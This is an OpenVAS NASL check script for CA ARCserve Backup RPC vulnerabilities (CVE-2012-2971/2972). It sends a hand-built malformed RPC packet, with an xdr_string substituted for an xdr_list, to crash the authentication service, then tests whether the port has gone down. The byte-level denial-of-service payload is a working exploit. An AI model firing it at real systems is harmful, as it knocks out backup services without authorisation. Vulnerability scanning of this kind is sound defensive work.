CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows

2012-11-2000:00:00

plugins.openvas.org

6.4 Medium

AI Score

Confidence

Low

0.678 Medium

EPSS

Percentile

98.0%

JSON

CA ARCserve Backup is prone to multiple vulnerabilities.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802677");
  script_version("2023-09-08T05:06:21+0000");
  script_cve_id("CVE-2012-2971", "CVE-2012-2972");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-09-08 05:06:21 +0000 (Fri, 08 Sep 2023)");
  script_tag(name:"creation_date", value:"2012-11-20 11:04:50 +0530 (Tue, 20 Nov 2012)");
  script_name("CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("gb_rpc_portmap_tcp_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("rpc/portmap/tcp/detected", "Host/runs_windows");

  script_xref(name:"URL", value:"http://secunia.com/advisories/51012/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56116");
  script_xref(name:"URL", value:"http://www.offensive-security.com/vulndev/ca-arcserve-rwslist-remote-code-execution/");
  script_xref(name:"URL", value:"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={F9EEA31E-8089-423E-B746-41B5C9DD2AC1}");

  script_tag(name:"impact", value:"Successful exploitation will remote attackers to execute arbitrary code or
  cause a denial of service condition.");

  script_tag(name:"affected", value:"CA ARCserve Backup for Windows r12.5, r15, r16.");

  script_tag(name:"insight", value:"The flaws are due to an error in the RPC service, which fails to validate
  user supplied crafted input.");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_tag(name:"summary", value:"CA ARCserve Backup is prone to multiple vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("rpc.inc");
include("http_func.inc");
include("host_details.inc");
include("byte_func.inc");

RPC_PROG = "100000";

port = rpc_get_port(program: RPC_PROG, protocol: IPPROTO_TCP);

if(port)
{
  # authentication service port request
  req_getport = raw_string(
  0x80, 0x00, 0x00, 0x38, 0x4f, 0x9d, 0xb4, 0xb2, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xa0, 0x00, 0x00, 0x00, 0x02,
  0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x09, 0x80,
  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00);

  soc = open_sock_tcp(port);

  send(socket:soc, data:req_getport);
  res = recv(socket:soc, length:100);
  close(soc);

  if(isnull(res)){
    exit(0);
  }

  reslen = strlen(res);

  # authentication service port number
  authport = hex2dec(xvalue:hexstr(res[reslen-2])+hexstr(res[reslen-1]));

  # dos request
  dos = raw_string(
  0x80, 0x00, 0x02, 0x68, 0x4f, 0x9d, 0x17, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x02, 0x00, 0x06, 0x09, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x7a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa1, 0x02, 0x35, 0x32, 0x35,
  0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x41,
  0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x31) +  crap(data:raw_string(0x30), length:98) + raw_string(
  0x34, 0x45, 0x38, 0x44, 0x44, 0x31, 0x36, 0x34, 0x44, 0x33, 0x41, 0x37, 0x31,
  0x42, 0x39, 0x43, 0x36, 0x46, 0x34, 0x43, 0x46, 0x42, 0x41, 0x42, 0x34, 0x32,
  0x35, 0x35, 0x42, 0x44, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x02,
  0x35, 0x32, 0x35, 0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x30, 0x41, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30,
  0x30, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30) +
  crap(data:raw_string(0x30), length:89) + raw_string (
  0x46, 0x30, 0x38, 0x30, 0x31, 0x43, 0x42, 0x41, 0x37, 0x38, 0x37, 0x36, 0x44,
  0x46, 0x30, 0x45, 0x44, 0x41, 0x44, 0x31, 0x36, 0x44, 0x43, 0x38, 0x36, 0x36,
  0x38, 0x39, 0x37, 0x33, 0x43, 0x31, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41,
  ## xdr_list was expected here, we replace it with
  ## an xdr_string to trigger the bug
  0x00, 0x00, 0x00, 0x06, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x00,
  ## string
  0x00, 0x00, 0x00, 0x17, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x00);

  soc2 = open_sock_tcp(authport);

  if(soc2)
  {
    send(socket:soc2, data:dos);
    res = recv(socket:soc2, length:100);
    close(soc2);
    sleep(15);
    soc3 = open_sock_tcp(authport);

    if(!soc3)
    {
      security_message(port:port, protocol:"tcp");
      exit(0);
    }
    close(soc3);
  }
}